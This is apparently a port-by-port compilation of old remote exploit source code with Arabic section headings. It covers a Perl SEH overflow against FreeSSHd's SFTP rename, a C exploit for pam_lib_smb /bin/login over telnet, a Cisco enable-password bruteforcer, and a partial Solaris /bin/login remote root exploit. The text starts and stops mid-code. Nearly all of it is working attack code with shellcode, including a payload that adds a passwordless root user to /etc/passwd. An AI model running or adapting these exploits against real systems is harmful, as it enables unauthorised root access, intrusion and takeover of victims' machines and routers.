"\xa6\x46\x38\x14\x43\xe9\xcb\xf1\xe5\x44\x8c\x5f\x 66\xd1\x4c\x66".
"\x97\x83\xb2\xe7\x64\xd1\x4a\x5d\x66\xd1\x4c\x66\x d6\x67\x1a\x47".
"\x64\xd1\x4a\x5e\x67\x7a\xc9\xf1\xe3\xbd\xf4\xe9\x 4a\xe8\xe5\x59".
"\xcc\xf8\xc9\xf1\xe3\x48\xf6\x6a\x55\x46\xff\x63\x ba\xcb\xf6\x5e".
"\x6a\x07\x50\x87\xd4\x44\xd8\x87\xd1\x1f\x5c\xfd\x 99\xd0\xde\x23".
"\xcd\x6c\xb0\x9d\xbe\x54\xa4\xa5\x98\x85\xf4\x7c\x cd\x9d\x8a\xf1".
"\x46\x6a\x63\xd8\x68\x79\xce\x5f\x62\x7f\xf6\x0f\x 62\x7f\xc9\x5f".
"\xcc\xfe\xf4\xa3\xea\x2b\x52\x5d\xcc\xf8\xf6\xf1\x cc\x19\x63\xde".
"\xb8\x79\x60\x8d\xf7\x4a\x63\xd8\x61\xd1\x4c\x66\x dc\xe0\x7c\x6e".
"\x60\xd1\x4a\xf1\xe3\x2e\x9c\x0e";
my $payload = $junk.$eip.$nops.$shellcode;
my $sftp = $ssh2->sftp();
$sftp->open($payload);
print "[+] Sent";
$ssh2->disconnect;
# [2008-10-22 ]
22 FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit (SEH)
# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit
#
# Advisory: http://www.bmgsec.com.au/advisory/45/
# Original: http://www.bmgsec.com.au/advisory/32/
# Related : http://www.bmgsec.com.au/advisory/42/
#
# Test box: WinXP Pro SP2 English
#
# Exploit code for a vulnerability I discovered sometime
# ago in FreeSSHd 1.2.1. This code should be run from a
# user titled "root", or adjust the payload for your
# username. I've left space for adjustments. Up to the
# first six NOPs can be used (inclusive).
#
# The code exploits a vulnerability in the SFTP Rename
# operation. The vulnerability was patched in 1.2.2
#
# 00416F98 50 PUSH EAX
# 00416F99 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
# 00416F9F 50 PUSH EAX
# 00416FA0 E8 45B50400 CALL <JMP.&MSVCRT.strcpy>
#
#
# Written and discovered by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
use Net::SSH2;
my $user = "root";
my $pass = "yahh";
my $ip = "127.0.0.1";
my $port = 22;
my $ssh2 = Net::SSH2->new();
print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";
$nop = "\x90";
$padding = 'A' x 105;
my $SEH = "\x21\x11\x40\x00"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe)
my $nextSEH = "\xEB\xF0\x90\x90"; # jmp short 240, nop, nop
$mShellcode = "\xE9\xF2\xFE\xFF\xFF";
# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com
my $shellcode =
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x02".
"\x28\x29\x10\x83\xeb\xfc\xe2\xf4\xfe\xc0\x6d\x10\x 02\x28\xa2\x55".
"\x3e\xa3\x55\x15\x7a\x29\xc6\x9b\x4d\x30\xa2\x4f\x 22\x29\xc2\x59".
"\x89\x1c\xa2\x11\xec\x19\xe9\x89\xae\xac\xe9\x64\x 05\xe9\xe3\x1d".
"\x03\xea\xc2\xe4\x39\x7c\x0d\x14\x77\xcd\xa2\x4f\x 26\x29\xc2\x76".
"\x89\x24\x62\x9b\x5d\x34\x28\xfb\x89\x34\xa2\x11\x e9\xa1\x75\x34".
"\x06\xeb\x18\xd0\x66\xa3\x69\x20\x87\xe8\x51\x1c\x 89\x68\x25\x9b".
"\x72\x34\x84\x9b\x6a\x20\xc2\x19\x89\xa8\x99\x10\x 02\x28\xa2\x78".
"\x3e\x77\x18\xe6\x62\x7e\xa0\xe8\x81\xe8\x52\x40\x 6a\x56\xf1\xf2".
"\x71\x40\xb1\xee\x88\x26\x7e\xef\xe5\x4b\x48\x7c\x 61\x28\x29\x10";
my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH;
my $sftp = $ssh2->sftp();
$sftp->rename($payload, 'B');
print "[+] Sent";
$ssh2->disconnect;
# [2009-03-27]
#######################################
انتهينا من بورت 22
#######################################
نبداء بـ بورت 23
23 Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit
/*
* Linux pam_lib_smb < 1.1.6 /bin/login exploit
* by vertex
*
* Tested on Redhat 8.0, 9.0
*
*
* Advisory at
* http://us2.samba.org/samba/ftp/pam_smb/
*
* code based on : UC_login.c
* SunOS 5.6,5.7,5.8 remote /bin/login root exploit
* [mikecc/unixclan]
*
* ================================================== ===========
* In order to use pam_lib_smb, need to add following line on top
* of /etc/pam.d/login
*
* auth required /lib/security/pam_smb_auth.so
*
* And config the /etc/pam_smb.conf correctly.
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>
/* first negotiate */
/* packet capture by ethereal */
char packet_1[] = {
0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb,
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff,
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,
0xff, 0xfb, 0x23 };
char packet_2[] = {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff,
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34,
0x30, 0x30, 0x2c, 0x33, 0x38, 0x34, 0x30, 0x30,
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69,
0x64, 0x73,
/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa,
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48,
0x4f, 0x52, 0x49, 0x54, 0x59, 0x01, 0x2f, 0x68,
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69, 0x65, 0x2f,
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74, 0x79, 0x00, 0x44, 0x49, 0x53, 0x50,
0x4c, 0x41, 0x59, 0x01,
};
char packet_2_1[]={
0x6c, 0x69, 0x64, 0x73,
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00,
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0 };
/* here is the TERM value */
/*
*/
void login(int);
void negotiate(int);
void sendstr(int,char *,int);
void wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int opt);
/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned char sc[] =
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";
int main(int argc,char **argv)
{
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
short port = -1;
int x;
char *host = NULL;
char *user = NULL;
char exp[1024];
int a;
char *default_port = "23";
printf("linux_pam_smb\n");
printf("Linux lib_pam_smb < 1.1.6 /bin/login remote exploit\n");
printf("[vertex//lids/org]\n\n");
if (argc < 2)
{
printf("%s -h <victim> [-p port] \n",argv[0]);
return 0;
}
while ((a = getopt(argc,argv,"h:p:u:")) != -1)
{
switch (a)
{
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
default:
printf("[-] invalid option.\n");
break;
}
}
if (host == NULL)
{
printf("[-] must specify a host to attack\n");
return 0;
}
if (port < 0)
port = atoi(default_port);
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
printf(" attacking %s:%d\n",host,port);
printf(" opening socket\n");
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("[-] could not create socket");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
printf("[-] failed to connect to %s\n",host);
return 0;
}
printf(" connected!\n");
printf(" Begin negotiate... \n");
negotiate(sd);
printf(" Login... \n");
login(sd);
return 0;
}
void login(int sd)
{
char buf[1024];
char exploit_buf[172];
char cx[3]="\r\n\0";
int x;
fd_set rset;
memset(exploit_buf,'\0',172);
/* let's jump to 0xbffffe30 */
/* eb 30 fe ff bf */
x = 0;
exploit_buf[x++]=0x68;
/* push 0xbffffe30 */
/* shellcode address */
exploit_buf[x++]=0x30;
exploit_buf[x++]=0xfe;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xbf;
exploit_buf[x++]=0xbf;
/* ret */
exploit_buf[x++]=0xc3;
memset(exploit_buf+x,'A',150);
x+=150;
/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is
pop $exx
pop $exx
ret
*/
exploit_buf[x++]=0xb5;
exploit_buf[x++]=0xd4;
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, "xie\r\n\0");
printf(" sending username \n");
sendstr(sd,buf,strlen(buf));
sleep(1);
printf(" sending password\n");
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, exploit_buf);
strcat(buf,"\r\n\0");
sendstr(sd,buf,strlen(buf));
sleep(2);
fflush(stdout);
FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
FD_SET(0,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(-1);
}
fprintf(stderr,"%s",buf);
}
if (FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}
/*
* telnet negotiation needed for
* talking with the telnet protocol
*/
void negotiate(int sd)
{
char buf[1024];
char nop[64];
int len;
sendstr(sd, packet_1,sizeof(packet_1));
sleep(2);
memset(buf,'\0',sizeof(buf));
memset(nop,'A',sizeof(nop));
memcpy(buf,packet_2,sizeof(packet_2));
/* adding NOP */
memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
/* shellcode */
memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
/* left packet */
memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc) ,packet_2_1,sizeof(packet_2_1));
len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
sendstr(sd, buf, len);
sleep(1);
/* wont echo */
wont(sd,TELOPT_ECHO);
sleep(1);
/* do echo */
cmd(sd,TELOPT_ECHO);
sleep(2);
}
/*
* send a telnet WONT
*
* structure of a telnet WONT is:
* 1. IAC
* 2. WONT
* 3. what you wont do
* (all of the above are found in arpa/telnet.h)
*/
void wont(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WONT,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
* send a telnet WILL
*
* structure of a telnet WILL is:
* 1. IAC
* 2. WILL
* 3. what you will do
* (all of the above are found in arpa/telnet.h)
*/
void will(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WILL,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
void cmd(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c\xfd%c",IAC,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
*
*/
void sendstr(int sd,char *str,int length)
{
write(sd,str,length);
sleep(1);
}
// [2003-08-29]
23 Cisco Password Bruteforcer Exploit
/*
.: free source :. .: coded 4 Avatar Corp :.
enabler.
cisco internal bruteforcer.
coder - norby
concept - anyone
this program just logs into a CISCO router and tries a list of
passes looking for the enable one.
it works in password-only CISCO as well in login-pass ones and
has been succesfully tested on many 2600 and a few 12008.
the prog's concept [bruteforcing a router for gaining enable access]
is quite simple ...how amazing I haven't seen similar progs before!
anti eleet&0day force ;)
anyway... information wants to be free :)
sciao belli
saluti a berserker mandarine, acidcrash
beho x la traduzione :)
norby
saluti a *lei*, saluti a gabriella che a capodanno
non ha voluto lasciare il ragazzo x fare un bambino con me ;)
saluti a tutti gli avatar, a sandman, a tutte le diecimila
persone che conosco
any
saluti a Acida, storm\, Raid
contact` norby - [email protected] anyone - [email protected]
www.avatarcorp.org
neural collapse _ i truly hope in this project
v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery
(very simple feature)
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"
struct sockaddr_in addr;
char host[100];
struct hostent *hp;
int sock_stat;
int n,x;
char **password;
char resolve(char *inputhost) {
int a,b,c,d;
if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
hp = gethostbyname(inputhost);
if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
(unsigned char)hp->h_addr_list[0][1],
(unsigned char)hp->h_addr_list[0][2],
(unsigned char)hp->h_addr_list[0][3]);
}
else { strncpy(host,inputhost,100); }
}
int sock(char *hostoresolve,int port) {
int err;
sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }
addr.sin_family = PF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);
err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
}
int banner() {
printf("\n%s enabler.\n", BOX);
printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
printf("%s coded by norby\n", BOX);
}
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }
void sig() {
if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
printf("\n\033[0m"); exit(0);
}
int login(char *login, char *pass) {
char *input = malloc(4000);
int reqlogin;
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,"ogin:")||strstr(input,"sername:")) {
if(!strcmp(login,"n0login")) {
printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
exit(0);
}
printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
}
if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
bzero(input,4000);
}
if(reqlogin==1) {
write(sock_stat,login,strlen(login));
write(sock_stat,"\r\n",2);
while(read(sock_stat,input,4000)>0) {
if(strstr(input,"assword")); { break; }
}
}
write(sock_stat,pass,strlen(pass));
write(sock_stat,"\r\n",2);
sleep(2);
bzero(input,4000);
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
/* if(strstr(input,"assword:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}*/
if(strstr(input,"sername:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}
bzero(input,4000);
}
}
int loadwordlist(char *list) {
FILE *passlist;
char buf[32], fake;
int i,z;
if ((passlist = fopen(list, "r")) == NULL) {
printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
exit(0);
}
(void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale
password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P
if(password == NULL) {
printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
exit(0);
}
(void)fseek(passlist, 0L, SEEK_SET);
while (!feof(passlist)) {
fgets(buf, 32, passlist);
if (buf[0] == '#' || buf[0] == '\n') continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
password[x] = malloc(32);
strcpy(password[x], buf);
memset(buf, 0, 32);
x++;
}
password[x] = 0x0;
fclose(passlist);
if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }
}
int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)
char *input = malloc(100);
int N;
bzero(input,100);
write(sock_stat,"enable",6);
write(sock_stat,"\r\n",2);
while(1) {
while(read(sock_stat,input,100)>0) {
if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
if(n+1==x) break;
if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
bzero(input,100);
}
if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }
if(strstr(input,"assword:")) {
write(sock_stat,password[n],strlen(password[n]));
write(sock_stat,"\r\n",2);
n++;
bzero(input,100);
if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
continue;
}
if(strstr(input,">")) {
write(sock_stat,"enable\r\n",8); bzero(input,100);
}
}
}
int main(int argc, char *argv[]) {
int port;
signal(SIGINT, sig);
banner();
if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }
if(!strcmp(argv[2],"-u")) {
if(argc==6) { port=atoi("23"); }
else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
// c'ho cosetta nella testa :?-- Corretto :)
printf("%s\n",BOX);
loadwordlist(argv[5]);
resolve(argv[1]);
sock(host, port);
login(argv[3],argv[4]);
brute();
}
else {
if(argc==4) { port=atoi("23"); }
else { port=atoi(argv[4]); }
printf("%s\n",BOX);
loadwordlist(argv[3]);
resolve(argv[1]);
sock(host, port);
login("n0login",argv[2]);
brute();
}
}
// [2001-01-19]
23 Solaris /bin/login Remote Root Exploit (SPARC/x86)
/*
* 7350963 - /bin/login remote root explot SPARC/x86
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
* bug found by scut 2001/12/20
* thanks to halvar,scut,typo,random,edi,xdr.
* special thanks to security.is.
*
* keep it private!
* don't distribute!
*/
//#define X86_FULL_PACKAGE
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>
void usage()
{
printf("usage: ./7350963 ip_of_the_victim\n");
}
void dump_hex(char *str,char *data,int len)
{
int i;
if(str)
{
printf("\n=======%s:%d========\n",str,len);
}
else
{
printf("\n=======================\n");
}
for(i=0; i < len ;i++)
{
printf("x%.2x\n", (data[i]&0xff));
}
printf("\n-----------------------\n");
for(i=0; i < len ;i++)
{
if(data[i]==0x00)
{
printf("|\n");
}
else
{
printf("%c\n",data[i]);
}
}
printf("\n");
fflush(stdout);
}
int send_data(int sock,const char *send_data,int send_len)
{
int wc;
int rc;
char recv_buf[1000];
if(send_data && send_len > 0)
{
wc=send(sock,send_data,send_len,0);
}
rc=recv(sock,recv_buf,sizeof(recv_buf),0);
if(rc > 0)
{
dump_hex("recv",recv_buf,rc);
}
}
int main(int argc,char *argv[])
{
int sock;
struct sockaddr_in address;
int i;
char send_data_1[]=
{
0xff,0xfd,0x03,
0xff,0xfb,0x18,
0xff,0xfb,0x1f,
0xff,0xfb,0x20,
0xff,0xfb,0x21,
0xff,0xfb,0x22,
0xff,0xfb,0x27,
0xff,0xfd,0x05,
0xff,0xfb,0x23
};
char send_data_2[]=
{
0xff,0xfa,0x1f,0x00,0x50,0x00,0x18,
0xff,0xf0,
0xff,0xfc,0x24
};
char send_data_3[]=
{
0xff,0xfd,0x01,
0xff,0xfc,0x01
};
char str_buffer[1024*30];
int str_buffer_pos=0;
char str_end[2]={0xd,0x0};
char *env_str;
int env_str_len;
char env_1[4]={0xff,0xfa,0x18,0x00};
char *terminal_name="xterm-debian";
char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00};
char *display="matter:0.0";
char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00};
char *display_var="DISPlAY";
char display_delimiter[1]={0x01};
char *display_value="matter:0.0";
char *environ_str;
int environ_str_len;
int env_cur_pos=0;
int env_num;
char env_4[2]={0xff,0xf0};
char exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n";
char login_buffer[]= "ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\
ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\
ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\
ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\
ji41=E ji42=A ji43=A ji44=e j";
char realfree_edx[]={0x83,0x83,0x83,0x83}; //0xdf9d6361 <realfree+81>: test $0x1,%dl¸¦ ³Ñ±â±â À§ÇؼÂ*
char login_buffer1[]="=A j";
#ifdef X86_FULL_PACKAGE
char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08};
#else
char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08};
#endif
char t_delete_edi_plus_0xa[]="=A j";
char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
char login_buffer1_0[]="=A ji48=A j ";
#ifdef X86_FULL_PACKAGE
char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08};
#else
char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08};
#endif
char login_buffer1_1[]="=\\\r\n\ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58=";
#ifdef X86_FULL_PACKAGE
char t_delete2_param1[]={0x29,0x80,0x06,0x08};
#else
char t_delete2_param1[]={0x21,0x80,0x06,0x08};
#endif
char login_buffer1_2[]="6=8";
char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff};
//ù¹ø° A -1 ÀÓ
char login_buffer2[]="A=AB";
// 0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS
//0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>: 0xdf9bd0b8 <strncpy>
//(gdb) print/x 0x80655a4 - 0x20
//$1 = 0x8065584
#ifdef X86_FULL_PACKAGE
char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08}; //strncpy-0x20,ecx
#else
char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08}; //strncpy-0x20,ecx
#endif
char login_buffer2_0[]="GHIJ";
char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
char login_buffer2_1[]="OPQRSTUVWXYZ";
//0x806810d <inputline+780>: 'A' <repeats 82 times>, "\n"
#ifdef X86_FULL_PACKAGE
char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08}; //shellcode,eax
#else
char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08}; //shellcode,eax
#endif
//0x8067e01 <inputline>: "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhf oiew
char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\
jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A
jw21=B jy"; //31=A z";//4=A k2=A k3=A k";
#ifdef X86_FULL_PACKAGE
//char strncpy_src[]={0xf9,0x3b,0x05,0x08};
char strncpy_src[]={0x31,0x80,0x06,0x08};
#else
char strncpy_src[]={0xf1,0x3b,0x05,0x08};
#endif
char env_buffer[]="hi1=A hi2=A hi3=A hi";
char pam_input_output_eax[]={0x48,0x8a,0x06,0x08}; //0x8068a48
char env_buffer0[]="hi5=A hi6=A hi7=A hi";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer[]={0x29,0x80,0x06,0x08};
#endif
char env_buffer2[]="zi9=";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer2[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer2[]={0x29,0x80,0x06,0x08};
#endif
char exp_buffer0[]="hello";
char jmp_code[]={0xeb,0xc};
char exp_buffer1[]="\\\r\nhhhhhhhhhhh";
char shellcode[]=
{
0xeb,0x1d,
0x5e, /*popl %esi*/
0x33,0xc0, /*xorl %eax,%eax*/
0x50, /*pushl %eax - ,0x0*/
#ifdef X86_FULL_PACKAGE
0x68,0x46,0x81,0x06,0x08,
0x68,0x43,0x81,0x06,0x08,
0x68,0x40,0x81,0x06,0x08,
0x68,0x38,0x81,0x06,0x08,
#else
0x68,0x3e,0x81,0x06,0x08,
0x68,0x3b,0x81,0x06,0x08,
0x68,0x38,0x81,0x06,0x08,
0x68,0x30,0x81,0x06,0x08,
#endif
#ifdef X86_FULL_PACKAGE
0xe8,0x25,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#else
0xe8,0x2e,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#endif
0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff /*call again*/
};
char exec_argv0[]="/bin/sh";
char exec_argv1[]="sh";
char exec_argv2[]="-c";
char exec_argv3[]="/bin/echo met::463:1::/:/bin/sh>>/etc/passwd;";
//"/bin/echo met::11652::::::>>/etc/shadow;";
//"/bin/finger @210.111.69.137";
//211.59.123.155";
char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer3[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer3[]={0x29,0x80,0x06,0x08};
#endif
char env_buffer5[]="70=b \\\r\n\hr371=b hs372=";
char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08};
char env_buffer5_0[]="473=";
char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08}; //0x8053bfa Àӽú¯Åë
char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};//0x806b1a8 display=""; terminal_name="";
if (argc < 2)
{
usage();
exit(-1);
}
env_str_len= sizeof(env_1) + strlen(terminal_name) + sizeof(env_2)+strlen(display) + sizeof(env_3) + strlen(display_var) + sizeof(display_delimiter) + strlen(display_value) + sizeof(env_4);
env_str=(char *)calloc(1,env_str_len);
if(env_str)
{
env_cur_pos=0;
memcpy(env_str+env_cur_pos,env_1,sizeof(env_1));
env_cur_pos += sizeof(env_1);
memcpy(env_str + env_cur_pos,terminal_name,strlen(terminal_name));
env_cur_pos += strlen(terminal_name);
memcpy(env_str + env_cur_pos,env_2,sizeof(env_2));
env_cur_pos += sizeof(env_2);
memcpy(env_str + env_cur_pos,display,strlen(display));
env_cur_pos += strlen(display);
memcpy(env_str + env_cur_pos,env_3,sizeof(env_3));
env_cur_pos += sizeof(env_3);
memcpy(env_str + env_cur_pos,display_var,strlen(display_var));
env_cur_pos += strlen(display_var);
memcpy(env_str + env_cur_pos,display_delimiter,sizeof(display_delim iter));
env_cur_pos+=sizeof(display_delimiter);
memcpy(env_str + env_cur_pos,display_value,strlen(display_value));
env_cur_pos += strlen(display_value);
memcpy(env_str + env_cur_pos,env_4,sizeof(env_4));
env_cur_pos += sizeof(env_4);
}
/*socket operation*/
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock < 0)
{
perror("socket");
return -1;
}
address.sin_family=AF_INET;
address.sin_port=htons(23);
//inet_pton(AF_INET,argv[1],&address.sin_addr); //on some system no inet_pton exists
address.sin_addr.s_addr=inet_addr(argv[1]);
if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0)
{
perror("connect");
return -1;
}
send_data(sock,NULL,0);
send_data(sock,send_data_1,sizeof(send_data_1));
send_data(sock,send_data_2,sizeof(send_data_2));
//dump_hex("env",env_str,env_cur_pos);
send_data(sock,env_str,env_cur_pos);
free(env_str);
send_data(sock,send_data_3,sizeof(send_data_3));
str_buffer_pos=0;
memcpy(str_buffer + str_buffer_pos,exploit_buffer,strlen(exploit_buffe r));
str_buffer_pos += strlen(exploit_buffer);
strcpy(str_buffer + str_buffer_pos,login_buffer);
str_buffer_pos += strlen(login_buffer);
memcpy(str_buffer + str_buffer_pos,realfree_edx,sizeof(realfree_edx));
